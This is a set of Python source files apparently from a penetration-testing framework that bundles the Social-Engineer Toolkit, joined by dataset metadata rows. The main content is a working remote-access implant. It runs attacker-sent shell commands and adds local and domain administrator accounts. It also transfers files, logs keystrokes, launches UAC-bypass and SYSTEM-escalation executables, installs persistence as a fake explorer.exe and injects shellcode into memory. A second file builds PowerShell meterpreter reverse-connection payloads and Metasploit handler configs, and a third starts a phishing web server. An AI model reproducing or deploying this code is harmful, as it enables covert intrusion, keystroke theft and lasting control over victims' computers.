# the block size for the cipher object; must be 16, 24, or 32 for AES
BLOCK_SIZE = 32
# the character used for padding--with a block cipher such as AES, the value
# you encrypt must be a multiple of BLOCK_SIZE in length. This character is
# used to ensure that your value is always a multiple of BLOCK_SIZE
PADDING = '{'
# one-liner to sufficiently pad the text to be encrypted
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
# random value here to randomize builds
a = 50 * 5
# one-liners to encrypt/encode and decrypt/decode a string
# encrypt with AES, encode with base64
EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)
#############################################
#
# Reboot Server Code through Native
# API.
#
#############################################
def AdjustPrivilege(priv, enable=1):
# Get the process token
flags = TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY
htoken = win32security.OpenProcessToken(
win32api.GetCurrentProcess(), flags)
# Get the ID for the system shutdown privilege.
idd = win32security.LookupPrivilegeValue(None, priv)
# Now obtain the privilege for this process.
# Create a list of the privileges to be added.
if enable:
newPrivileges = [(idd, SE_PRIVILEGE_ENABLED)]
else:
newPrivileges = [(idd, 0)]
# and make the adjustment
win32security.AdjustTokenPrivileges(htoken, 0, newPrivileges)
def RebootServer(message='Rebooting', timeout=0, bForce=0, bReboot=1):
AdjustPrivilege(SE_SHUTDOWN_NAME)
try:
win32api.InitiateSystemShutdown(
None, message, timeout, bForce, bReboot)
finally:
# Now we remove the privilege we just added.
AdjustPrivilege(SE_SHUTDOWN_NAME, 0)
def AbortReboot():
AdjustPrivilege(SE_SHUTDOWN_NAME)
try:
win32api.AbortSystemShutdown(None)
finally:
AdjustPrivilege(SE_SHUTDOWN_NAME, 0)
########################################
#
# Start Paramiko Code here
#
########################################
def handler(chan, host, port):
sock = socket()
try:
sock.connect((host, port))
except Exception as e:
if verbose == True:
print(e)
return
while True:
r, w, x = select.select([sock, chan], [], [])
if sock in r:
data = sock.recv(1024)
if len(data) == 0:
break
chan.send(data)
if chan in r:
data = chan.recv(1024)
if len(data) == 0:
break
sock.send(data)
chan.close()
sock.close()
# here is where we start the transport request for port forward on victim
# then tunnel over via thread and handler
def reverse_forward_tunnel(server_port, remote_host, remote_port, transport):
transport.request_port_forward('', server_port)
# while we accept transport via thread handler continue loop
while True:
chan = transport.accept(1000)
if chan is None:
continue
# define thread
thr = threading.Thread(target=handler, args=(
chan, remote_host, remote_port))
# set thread as daemon
thr.setDaemon(True)
# start thread
thr.start()
########################################
#
# End Paramiko Code here
#
########################################
# main outside loop for the shell
try:
while 1:
# second inside loop
while 1:
# receive socket connection from attacker
data = sockobj.recv(1024)
if data == "quit" or data == "":
sys.exit()
# if the length is 52 then we support encryption
if len(data) == 52:
encryption = 1
sockobj.send(data)
data = sockobj.recv(1024)
data = binascii.unhexlify(data)
secret = data
cipher = AES.new(secret, AES.MODE_ECB)
break
# if the length is 51 then we don't support encryption
if len(data) == 51:
# if we don't support encryption then break out
cipher = ""
sockobj.send(data)
encryption = 0
break
# while true loop forever
while 1:
# define data as a received information from attacker machine
data = sockobj.recv(1024)
# decrypt the packet which will tell us length to be sent
data = decrypt_packet(data, encryption, cipher)
# leverage the previous data socket connection as our length for
# our next socket
data = sockobj.recv(int(data))
# this will be our actual data packet
data = decrypt_packet(data, encryption, cipher)
# if data == quit or exit break out of main loop and renegotiate
# encryption
if data == "quit" or data == "exit":
break
# if the attacker specifies a command shell lets get it ready
if data == "shell":
# specify another while loop to put us into the subprocess
# commands
while 1:
# try block
try:
# define data as a received information from attacker
# machine
data = sockobj.recv(1024)
# decrypt the packet which will tell us length to be
# sent
data = decrypt_packet(data, encryption, cipher)
# leverage the previous data socket connection as our
# length for our next socket
data = sockobj.recv(int(data))
# this will be our actual data packet
data = decrypt_packet(data, encryption, cipher)
# if we receive data 'exit' then break out of the loop
# but keep socket alive
if data == "exit" or data == "quit":
data = ""
# break out of the loop
break
# note that you have to do some funky stuff with stdout, stderr, and stdin,
# when you use a non-console window subprocess bugs out (known since python
# 2.5.1). You need to pipe all the channels out to subprocess.PIPE then
# communicate with only stdout via proc.stdout.read() if not you will get a
# major error when running the shell.
# send our command that would be 'data'
proc = subprocess.Popen(
data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
# communicate with stdout and send it back to attacker
stdout_value = proc.stdout.read()
# if we have an error just append to nothing if needed
stdout_value += proc.stderr.read()
# do the actual send
send_packet(str(stdout_value) + "\r\n",
sockobj, encryption, cipher)
# except a keyboard interrupt shouldn't actually hit this
# since we are using commands from attacker
except KeyboardInterrupt:
# close socket
sockobj.close()
# exit
sys.exit()
# except all other errors
except Exception as e:
if verbose == True:
print(e)
# pass through them
pass
# this section adds a local admin on the local system
if data == "localadmin":
try:
# define data as a received information from attacker
# machine
data = sockobj.recv(1024)
# decrypt the packet which will tell us length to be sent
data = decrypt_packet(data, encryption, cipher)
# leverage the previous data socket connection as our
# length for our next socket
data = sockobj.recv(int(data))
# this will be our actual data packet
data = decrypt_packet(data, encryption, cipher)
# split the data sent, should be seperated by a command ","
# which splits into a tuple
data = data.split(",")
# this initiates subprocess.Popen as a shell command and
# uses net user to add a local user account initally
# locally
proc = subprocess.Popen("net user %s %s /ADD" % (data[0], data[
1]), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE).wait()
# this initiates subprocess.Popen as a shell command and
# uses net localgroup to add a local administrator
proc = subprocess.Popen("net localgroup administrators %s /ADD" % (
data[0]), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE).wait()
# except exception
except Exception as e:
if verbose == True:
print(e)
pass
# this section adds a domain admin on the local system
if data == "domainadmin":
try:
# define data as a received information from attacker
# machine
data = sockobj.recv(1024)
# decrypt the packet which will tell us length to be sent
data = decrypt_packet(data, encryption, cipher)
# leverage the previous data socket connection as our
# length for our next socket
data = sockobj.recv(int(data))
# this will be our actual data packet
data = decrypt_packet(data, encryption, cipher)
# split the data sent, should be seperated by a command ","
# which splits into a tuple
data = data.split(",")
# this initiates subprocess.Popen as a shell command and
# uses net user to add a domain user account initially
proc = subprocess.Popen("net user %s %s /ADD /DOMAIN" % (data[0], data[
1]), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE).wait()
# this initiates subprocess.Popen as a shell command and
# uses net group to add to domain admins
proc = subprocess.Popen('net group "Domain Admins" %s /ADD /DOMAIN' % (
data[0]), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE).wait()
# except errors and don't pass them yet, will add to logging
# later
except Exception as e:
if verbose == True:
print(e)
pass
# this section is if the attacker wants to download a file
if data == "downloadfile":
try:
# define data as a received information from attacker
# machine
data = sockobj.recv(1024)
# decrypt the packet which will tell us length to be sent
data = decrypt_packet(data, encryption, cipher)
# leverage the previous data socket connection as our length for our next socket
# data=sockobj.recv(int(data))
data = sockobj.recv(1024)
# this will be our actual data packet
download = decrypt_packet(data, encryption, cipher)
# if the file isn't there let the listener know
if not os.path.isfile(download):
# send that the file isn't found
send_packet("File not found.", sockobj,
encryption, cipher)
# if the file is there then cycle through it and let the
# listener know
if os.path.isfile(download):
# open the file for read/binary
fileopen = open(download, "rb")
data_file = ""
# while data send socket per line
for data in fileopen:
data_file += data
send_packet(data_file, sockobj, encryption, cipher)
# except exception
except Exception as e:
if verbose == True:
print(e)
pass
# this section is if the attacker wants to upload a file
if data == "uploadfile":
# try block
try:
# define data as a received information from attacker
# machine
data = sockobj.recv(1024)
# decrypt the packet which will tell us length to be sent
data = decrypt_packet(data, encryption, cipher)
# this will be our encrypted filepath
data = sockobj.recv(1024)
# decrypted file path
data = decrypt_packet(data, encryption, cipher)
upload_path = data
# specify file to write
filewrite = open(upload_path, "wb")
# this will be our length for our file
data = sockobj.recv(1024)
# decrypt the length of our file
data = decrypt_packet(data, encryption, cipher)
# here is an ugly hack but it works, basically we set two
# counters. MSGLEN which will eventually equal the length
# of what number was sent to us which represented the length
# of the output of the shell command we executed. Dataout
# will eventually equal the entire string loaded into our
# buffer then sent for decryption.
#
# A loop is started which continues to receive until we hit
# the length of what our entire full encrypted shell output
# is equaled. Once that occurs, we are out of our loop and
# the full string is sent to the decryption routine and
# presented back to us.
MSGLEN = 0
dataout = ""
length = int(data)
while MSGLEN != length:
data = sockobj.recv(1024)
dataout += data
MSGLEN = MSGLEN + len(data)
data = decrypt_packet(dataout, encryption, cipher)
filewrite.write(data)
# close file after write
filewrite.close()
# confirm its there
if os.path.isfile(upload_path):
send_packet("Confirmed", sockobj, encryption, cipher)
# if its not then send back failed
if not os.path.isfile(upload_path):
send_packet("Failed", sockobj, encryption, cipher)
# handle error messages
except Exception as e:
if verbose == True:
print(e)
pass
# here is where we start our paramiko SSH tunneling
if data == "paramiko":
# start initial try block
try:
# send to the server that we support paramiko
send_packet("Paramiko Confirmed.",
sockobj, encryption, cipher)
# receive all of our variables to establish tunnel
data = sockobj.recv(1024)
# decrypt the packet
data = decrypt_packet(data, encryption, cipher)
# receive all
data = sockobj.recv(int(data))
data = decrypt_packet(data, encryption, cipher)
# split into a tuple
data = data.split(",")
# IP of the SSH server
ssh_server_ip = data[0]
# PORT of the SSH server
ssh_server_port_address = data[1]
# PORT to use on localhost for tunneled protcol
ssh_server_tunnel_port = data[2]
# username for SSH server
ssh_server_username = data[3]
# password for SSH server
ssh_server_password = data[4]
# PORT to forward from victim
victim_server_port = data[5]
# specify data as ssh_port_tunnel
# main class here
def main(garbage_one, garbage_two, garbage_three):
# our ssh server
server = [ssh_server_ip, int(ssh_server_port_address)]
# what we want to tunnel
remote = ['127.0.0.1', int(victim_server_port)]
password = ssh_server_password # our password
client = paramiko.SSHClient() # use the paramiko SSHClient
client.load_system_host_keys() # load SSH keys
client.set_missing_host_key_policy(
paramiko.AutoAddPolicy()) # automatically add SSH key
try:
client.connect(server[0], server[
1], username=ssh_server_username, key_filename=None, look_for_keys=False, password=password)
# except exception
except Exception as e:
if verbose == True:
print('*** Failed to connect to %s:%d: %r' % (server[0], server[1], e))
try:
reverse_forward_tunnel(ssh_server_tunnel_port, remote[
0], remote[1], client.get_transport())
# except exception
except Exception as e:
if verbose == True:
print(e)
# have to pass some garbage to start thread
garbage_one = ""
garbage_two = ""
garbage_three = ""
# start a new thread to ensure that when we establish an SSH tunnel we can continue
# to leverage SET interactive shell.
# this starts the main routine which is where we get all
# our port forward stuff
thread.start_new_thread(
main, (garbage_one, garbage_two, garbage_three))
# except exception
except Exception as e:
if verbose == True:
print(e)
# lock the workstation of victim
if data == "lockworkstation":
ctypes.windll.user32.LockWorkStation()
# elevate permissions
if data == "getsystem":
try:
temp_path = os.getenv('TEMP')
# this is our shell exectuable
set_payload = temp_path + "\\" + \
generate_random_string(10, 15) + ".exe"
# accept the file and write it do disk as the set_payload
# variable
upload_file(set_payload)
# sleep 0.5 seconds
time.sleep(0.5)
# this will spawn the shell in a seperate process thread as
# SYSTEM
def getsystem(set_payload, ipaddr):
# generate a random string between 10 and 15 length
service_name = generate_random_string(10, 15)
# create a service
subprocess.Popen('sc create %s binpath= "cmd /c %s %s" type= own' %
(service_name, set_payload, ipaddr), shell=True).wait()
# start the service, don't wait for it to finish
subprocess.Popen("sc start %s" %
(service_name), shell=True)
# define data as a received information from attacker
# machine
data = sockobj.recv(1024)
# decrypt the packet which will tell us length to be sent
data = decrypt_packet(data, encryption, cipher)
# this will be our ipaddress and port
data = sockobj.recv(1024)
# decrypted file path
data = decrypt_packet(data, encryption, cipher)
# this is our ipaddress and port
ipaddr = data
#
# start a new thread
#
thread.start_new_thread(getsystem, (set_payload, ipaddr))
# handle error messages
except Exception as e:
if verbose == True:
print(e)
pass
# keystroke logging
if data == "keystroke_start":
# TEMP directory
temp_path = os.getenv('TEMP')
# this is the log file
global logfile
logfile = temp_path + "\\" + generate_random_string(10, 15)
# trigger an event
def OnKeyboardEvent(event):
filewrite = open(logfile, "a")
filewrite.write(chr(event.Ascii))
filewrite.close()
return True
# start keystroke logging
def start_keystroke(garbage1, garbage2, garbage3):
hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()
# need to pass vars to meet threading requirements
garbage1 = ""
garbage2 = ""
garbage3 = ""
# start the keystroke logger
thread.start_new_thread(
start_keystroke, (garbage1, garbage2, garbage3))
# dump keystrokes
if data == "keystroke_dump":
# set a flag to test if we ran keystroke_start first
flag = 0
# try to see if logfile is there
try:
logfile
except:
flag = 1
# if we are all set
if flag == 0:
# open the logfile
if os.path.isfile(logfile):
fileopen = open(logfile, "r")
# read all the data
data = fileopen.read()
# if we found nothing yet
if data == "":
data = "[!] There is no captured keystrokes yet."
if not os.path.isfile(logfile):
data = "[!] There is no captured keystrokes yet."
send_packet(data, sockobj, encryption, cipher)
# if we didn't start the keystroke
if flag == 1:
send_packet(
"[!] It doesn't appear keystroke_start is running, did you execute the command?", sockobj, encryption, cipher)
# bypass windows uac
if data == "bypassuac":
# try block
try:
# TEMP directory
temp_path = os.getenv('TEMP')
# this is our bypass uac executable
bypassuac = temp_path + "\\" + \
generate_random_string(10, 15) + ".exe"
# this is our actual SET payload to be executed with UAC
# safe stuff
set_payload = temp_path + "\\" + \
generate_random_string(10, 15) + ".exe"
# upload our files first is bypass uac
upload_file(bypassuac)
# sleep 0.5 seconds
time.sleep(0.5)
# set payload
upload_file(set_payload)
# this will spawn the shell in a seperate process thread
def launch_uac(bypassuac, set_payload, ipaddress):
subprocess.Popen(
"%s /c %s %s" % (bypassuac, set_payload, ipaddress), shell=True).wait()
# define data as a received information from attacker
# machine
data = sockobj.recv(1024)
# decrypt the packet which will tell us length to be sent
data = decrypt_packet(data, encryption, cipher)
# this will be our ipaddress and port
data = sockobj.recv(1024)
# decrypted file path
data = decrypt_packet(data, encryption, cipher)
# this is our ipaddress and port
ipaddr = data
#
# start a new thread
#
thread.start_new_thread(
launch_uac, (bypassuac, set_payload, ipaddr))
# handle error messages
except Exception as e:
if verbose == True:
print(e)
pass
# remov for SET
if data == "removepersistence":
# try block
try:
# WINDIR directory
windir_path = os.getenv('WINDIR')
# this is our SET interactive service executable
# set_service = windir_path + "\\system32\\" + generate_random_string(10,15) + ".exe"
set_service = windir_path + "\\system32\\" + "explorer.exe"
subprocess.Popen("%s stop" % (
set_service), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
subprocess.Popen("%s remove" % (
set_service), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
# handle error messages
except Exception as e:
if verbose == True:
print(e)
pass
# persistence for SET
if data == "persistence":
# try block
try:
# WINDIR directory
windir_path = os.getenv('WINDIR')
# enumerate home directory
homedir_path = os.getenv("SystemDrive")
homedir_path = homedir_path + "\\Program Files\\Common Files\\"
# see if we are running vista/windows 7 (potential for UAC)
os_counter = 0
# see if its vista or windows 7
if os.path.isdir(homedir_path):
os_counter = 1
set_service = homedir_path + "explorer.exe"
set_shell = homedir_path + \
generate_random_string(10, 15) + ".exe"
# this is our SET interactive service executable
# if its at system32
if os_counter == 0:
if os.path.isdir("%s\\system32" % (windir_path)):
set_service = windir_path + "\\system32\\" + "explorer.exe"
# this is the SET interactive shell
set_shell = windir_path + "\\system32\\" + \
generate_random_string(10, 15) + ".exe"
# upload the persistence set interactive shell
upload_file(set_service)
# sleep 0.5 seconds
time.sleep(0.5)
# upload our SET interactive service
upload_file(set_shell)
# define data as a received information from attacker
# machine
data = sockobj.recv(1024)
# decrypt the packet which will tell us length to be sent
data = decrypt_packet(data, encryption, cipher)
# this will be our ipaddress and port
data = sockobj.recv(1024)
# decrypted file path
data = decrypt_packet(data, encryption, cipher)
# this is our ipaddress and port
ipaddr = data
#ipaddr = set_shell + " " + ipaddr
if os_counter == 0:
filewrite = open("%s\\system32\\isjxwqjs" %
(windir_path), "w")
if os_counter == 1:
filewrite = open("%sisjxwqjs" % (homedir_path), "w")
filewrite.write('"' + set_shell + '"' + " " + ipaddr)
filewrite.close()
time.sleep(2)
# automatically start service
subprocess.Popen('"%s" --startup auto install' % (set_service), shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
time.sleep(5)
# start the service
subprocess.Popen('"%s" start' % (
set_service), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
# handle error messages
except Exception as e:
if verbose == True:
print(e)
pass
# if the attacker specifies a command shell lets get it ready
if data == "ps":
try:
# if we're running windows then use win32process to
# enumerate
if operating_system == "windows":
processes = win32process.EnumProcesses()
data = ""
for pid in processes:
try:
handle = win32api.OpenProcess(
win32con.PROCESS_ALL_ACCESS, False, pid)
exe = win32process.GetModuleFileNameEx(
handle, 0)
data += exe + " PID:" + str(pid) + "\r\n"
except:
pass
# if we're running linux then run subprocess ps -aux to
# enumerate
if operating_system == "posix":
# send our command that would be 'data'
proc = subprocess.Popen(
"ps -ax", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
# communicate with stdout and send it back to attacker
stdout_value = proc.stdout.read()
# if we have an error just append to nothing if needed
stdout_value += proc.stderr.read()
# send the data back
data = stdout_value
# send our data
send_packet(data, sockobj, encryption, cipher)
except Exception as e:
if verbose == True:
print(e)
# if we want to kill a process
if data == "kill":
try:
# recv initial length of next socket
data = sockobj.recv(1024)
data = decrypt_packet(data, encryption, cipher)
# this should be our pid to kill
data = sockobj.recv(int(data))
pid = decrypt_packet(data, encryption, cipher)
# if we're running windows then use win32api to kill and
# terminate process
if operating_system == "windows":
# specify handler as the process id received
handler = win32api.OpenProcess(
win32con.PROCESS_TERMINATE, 0, int(pid))
# kill the process through the win32api
# TerminatorProcess function call
win32api.TerminateProcess(handler, 0)
# if we're running linux then run kill -9
if operating_system == "posix":
subprocess.Popen("kill -9 %s" % (pid), shell=True)
data = "Confirmed kill"
# send our data
send_packet(data, sockobj, encryption, cipher)
# except exception
except Exception as e:
if verbose == True:
print(e)
sys.exit()
# this is for rebooting the server
if data == "reboot":
try:
# if we're running windows then use win32process to
# enumerate
if operating_system == "windows":
RebootServer()
data = "[*] Server has been rebooted."
# if we're running linux then run subprocess ps -aux to
# enumerate
if operating_system == "posix":
# send our command that would be 'data'
proc = subprocess.Popen(
"reboot now", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
# send the data back
data = "[*] Server has been rebooted."
# send our data
send_packet(data, sockobj, encryption, cipher)
except Exception as e:
if verbose == True:
print(e)
# this section is if the attacker wants to upload a file
if data == "shellcode":
# try block
try:
# define data as a received information from attacker
# machine
data = sockobj.recv(1024)
# decrypt the packet which will tell us length to be sent
data = decrypt_packet(data, encryption, cipher)
# here is an ugly hack but it works, basically we set two
# counters. MSGLEN which will eventually equal the length
# of what number was sent to us which represented the length
# of the output of the shell command we executed. Dataout
# will eventually equal the entire string loaded into our
# buffer then sent for decryption.
#
# A loop is started which continues to receive until we hit
# the length of what our entire full encrypted shell output
# is equaled. Once that occurs, we are out of our loop and
# the full string is sent to the decryption routine and
# presented back to us.
MSGLEN = 0
dataout = ""
length = int(data)
while MSGLEN != length:
data = sockobj.recv(1024)
dataout += data
MSGLEN = MSGLEN + len(data)
data = decrypt_packet(dataout, encryption, cipher)
shellcode = bytearray("%s" % (data))
# awesome shellcode injection code
# http://www.debasish.in/2012/04/execute-shellcode-using-python.html
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(
len(shellcode)),
ctypes.c_int(
0x3000),
ctypes.c_int(0x40))
ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr),
ctypes.c_int(len(shellcode)))
buf = (ctypes.c_char * len(shellcode)
).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(
ctypes.c_int(ht), ctypes.c_int(-1))
# handle error messages
except Exception as e:
if verbose == True:
print(e)
pass
# keyboard interrupts here
except KeyboardInterrupt:
if verbose == True:
print("[!] KeyboardInterrupt detected. Bombing out of the interactive shell.")
# handle exceptions
except Exception as e:
if verbose == True:
print(e)
sys.exit()
| 49,697 | Python | .py | 1,041 | 31.71854 | 138 | 0.511963 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,827 | prep.py | CHEGEBB_africana-framework/externals/set/src/payloads/powershell/prep.py | #!/usr/bin/env python3
import sys
import subprocess
import re
import os
import time
from src.core.setcore import *
# grab stage encoding flag
stage_encoding = check_config("STAGE_ENCODING=").lower()
if stage_encoding == "off":
stage_encoding = "false"
else:
stage_encoding = "true"
# check to see if we are just generating powershell code
powershell_solo = check_options("POWERSHELL_SOLO")
# check if port is there
port = check_options("PORT=")
# check if we are using auto_migrate
auto_migrate = check_config("AUTO_MIGRATE=")
# check if we are using pyinjection
pyinjection = check_options("PYINJECTION=")
if pyinjection == "ON":
# check to ensure that the payload options were specified right
if os.path.isfile(userconfigpath + "payload_options.shellcode"):
pyinjection = "on"
print_status(
"Multi/Pyinjection was specified. Overriding config options.")
else:
pyinjection = "off"
# grab ipaddress
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr = input("Enter the ipaddress for the reverse connection: ")
update_options("IPADDR=" + ipaddr)
# check to see if we are using multi powershell injection
multi_injection = check_config("POWERSHELL_MULTI_INJECTION=").lower()
# turn off multi injection if pyinjection is specified
if pyinjection == "on":
multi_injection = "off"
# check what payloads we are using
powershell_inject_x86 = check_config("POWERSHELL_INJECT_PAYLOAD_X86=")
# if we specified a hostname then default to reverse https/http
if validate_ip(ipaddr) == False:
powershell_inject_x86 = "windows/meterpreter/reverse_https"
# prompt what port to listen on for powershell then make an append to the current
# metasploit answer file
if os.path.isfile("%s/meta_config_multipyinjector" % (userconfigpath)):
# if we have multi injection on, don't worry about these
if multi_injection != "on":
if pyinjection == "off":
print_status(
"POWERSHELL_INJECTION is set to ON with multi-pyinjector")
port = input(setprompt(
["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if port == "":
port = "443"
fileopen = open("%s/meta_config_multipyinjector" % (userconfigpath), "r")
data = fileopen.read()
match = re.search(port, data)
if not match:
filewrite = open(
"%s/meta_config_multipyinjector" % (userconfigpath), "a")
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write(
"set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD %s\nset LHOST %s\nset LPORT %s\nset EnableStageEncoding %s\nset ExitOnSession false\nexploit -j\n" %
(powershell_inject_x86, ipaddr, port, stage_encoding))
filewrite.close()
# if we have multi injection on, don't worry about these
if multi_injection != "on":
if pyinjection == "off":
# check to see if the meta config multi pyinjector is there
if not os.path.isfile("%s/meta_config_multipyinjector" % (userconfigpath)):
if check_options("PORT=") != 0:
port = check_options("PORT=")
# if port.options isnt there then prompt
else:
port = input(setprompt(
["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if port == "":
port = "443"
update_options("PORT=" + port)
# turn off multi_injection if we are riding solo from the powershell menu
if powershell_solo == "ON":
multi_injection = "off"
pyinjection = "on"
# if we are using multi powershell injection
if multi_injection == "on":
if pyinjection == "off":
print_status(
"Multi-Powershell-Injection is set to ON, this should be sweet...")
# define a base variable
x86 = ""
# specify a list we will use for later
multi_injection_x86 = ""
# here we do some funky loops so we don't need to rewrite the code below
if multi_injection == "on":
port = check_config("POWERSHELL_MULTI_PORTS=")
port = port.split(",")
if multi_injection == "on":
# iterate through the ports, used for POWERSHELL_MULTI_PORTS
for ports in port:
# dont cycle through if theres a blank
if ports != "":
print_status(
"Generating x86-based powershell injection code for port: %s" % (ports))
multi_injection_x86 = multi_injection_x86 + "," + \
generate_powershell_alphanumeric_payload(
powershell_inject_x86, ipaddr, ports, x86)
if os.path.isfile("%s/meta_config_multipyinjector" % (userconfigpath)):
port_check = check_ports(
"%s/meta_config_multipyinjector" % (userconfigpath), ports)
if port_check == False:
filewrite = open(
"%s/meta_config_multipyinjector" % (userconfigpath), "a")
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write(
"set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD %s\nset LHOST %s\nset EnableStageEncoding %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\n\n" % (
powershell_inject_x86, ipaddr, stage_encoding, ports))
filewrite.close()
# if we aren't using multi pyinjector
if not os.path.isfile("%s/meta_config_multipyinjector" % (userconfigpath)):
# if meta config isn't created yet then create it
if not os.path.isfile("%s/meta_config" % (userconfigpath)):
filewrite = open("%s/meta_config" % (userconfigpath), "w")
filewrite.write("")
filewrite.close()
port_check = check_ports("%s/meta_config" % (userconfigpath), ports)
if port_check == False:
filewrite = open("%s/meta_config" % (userconfigpath), "a")
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write(
"set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD %s\nset LHOST %s\nset EnableStageEncoding %s\nset ExitOnSession false\nset LPORT %s\nexploit -j\n\n" % (
powershell_inject_x86, ipaddr, stage_encoding, ports))
filewrite.close()
# here we do everything if pyinjection or multi pyinjection was specified
if pyinjection == "on":
multi_injection_x86 = ""
# read in the file we need for parsing
fileopen = open(userconfigpath + "payload_options.shellcode", "r")
payloads = fileopen.read()[:-1].rstrip() # strips an extra ,
payloads = payloads.split(",")
# format: payload<space>port
for payload in payloads:
# format: payload<space>port
payload = payload.split(" ")
powershell_inject_x86 = payload[0]
port = payload[1]
print_status("Generating x86-based powershell injection code...")
multi_injection_x86 = multi_injection_x86 + "," + \
generate_powershell_alphanumeric_payload(
powershell_inject_x86, ipaddr, port, x86)
# if its turned to off
if multi_injection == "off":
if pyinjection == "off":
print_status("Generating x86-based powershell injection code...")
x86 = generate_powershell_alphanumeric_payload(
powershell_inject_x86, ipaddr, port, x86)
# if we are specifying multi powershell injection
if multi_injection == "on" or pyinjection == "on":
x86 = multi_injection_x86[1:] # remove comma at beginning
# check to see if we want to display the powershell command to the user
verbose = check_config("POWERSHELL_VERBOSE=")
if verbose.lower() == "on":
print_status("Printing the x86 based encoded code...")
time.sleep(3)
print(x86)
filewrite = open("%s/x86.powershell" % (userconfigpath), "w")
filewrite.write(x86)
filewrite.close()
print_status("Finished generating powershell injection bypass.")
print_status("Encoded to bypass execution restriction policy...")
| 8,566 | Python | .py | 178 | 38.893258 | 153 | 0.628961 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,828 | spawn.py | CHEGEBB_africana-framework/externals/set/src/html/spawn.py | #!/usr/bin/env python3
import os
import sys
import re
import socket
import subprocess
from src.core.setcore import *
#python 3 compatibility
try: import thread
except ImportError: import _thread as thread
import shutil
import re
import threading
import socket
import datetime
# set current path
definepath = os.getcwd()
# check os
operating_system = check_os()
# set default value for automatic listener
automatic_listener = ""
# specify base msf_path
msf_path = ""
try: module_reload(pexpect)
except: import pexpect
# see if we are tracking emails
track_email = check_config("TRACK_EMAIL_ADDRESSES=").lower()
# grab the randomized applet name
applet_name = check_options("APPLET_NAME=")
if applet_name == "":
applet_name = generate_random_string(6, 15) + ".jar"
update_options("APPLET_NAME=" + applet_name)
# define if we are using a custom payload
custom = 0
if check_options("CUSTOM_EXE="):
custom = 1
if not "CMD/MULTI" in check_options("CUSTOM_EXE="):
# here we need to modify the java applet to recognize custom attribute
fileopen3 = fileopen = open("%s/web_clone/index.html" % (userconfigpath), "r")
filewrite = open("%s/web_clone/index.html.new" % (userconfigpath), "w")
data = fileopen3.read()
# we randomize param name so static sigs cant be used
goat_random = generate_random_string(4, 4)
data = data.replace('param name="8" value="YES"', 'param name="8" value="%s"' % (goat_random))
filewrite.write(data)
filewrite.close()
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (userconfigpath, userconfigpath), shell=True).wait()
print_status("Note that since you are using a custom payload, you will need to create your OWN listener.")
print_status("SET has no idea what type of payload you are using, so you will need to set this up manually.")
print_status("If using a custom Metasploit payload, setup a multi/handler, etc. to capture the connection back.")
# see if we are using setshell
set_payload = ""
if os.path.isfile(userconfigpath + "set.payload"):
fileopen = open(userconfigpath + "set.payload", "r")
for line in fileopen:
set_payload = line.rstrip()
##########################################################################
#
# Start of the SET Web Server for multiattack, java applet, etc.
#
##########################################################################
def web_server_start():
# define if use apache or not
apache = 0
# open set_config here
apache_check = check_config("APACHE_SERVER=").lower()
if apache_check == "on" or track_email == "on":
apache_path = check_config("APACHE_DIRECTORY=")
if os.path.isdir(apache_path + "/html"):
apache_path = apache_path + "/html"
apache = 1
if operating_system == "windows":
apache = 0
# specify the web port
web_port = check_config("WEB_PORT=")
# see if exploit requires webdav
if os.path.isfile(userconfigpath + "meta_config"):
fileopen = open(userconfigpath + "meta_config", "r")
for line in fileopen:
line = line.rstrip()
match = re.search("set SRVPORT 80", line)
if match:
match2 = re.search("set SRVPORT 8080", line)
if not match2:
web_port = 8080
# check ip address
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr = input("Enter your ipaddress: ")
# Grab custom or set defined
if os.path.isfile(userconfigpath + "site.template"):
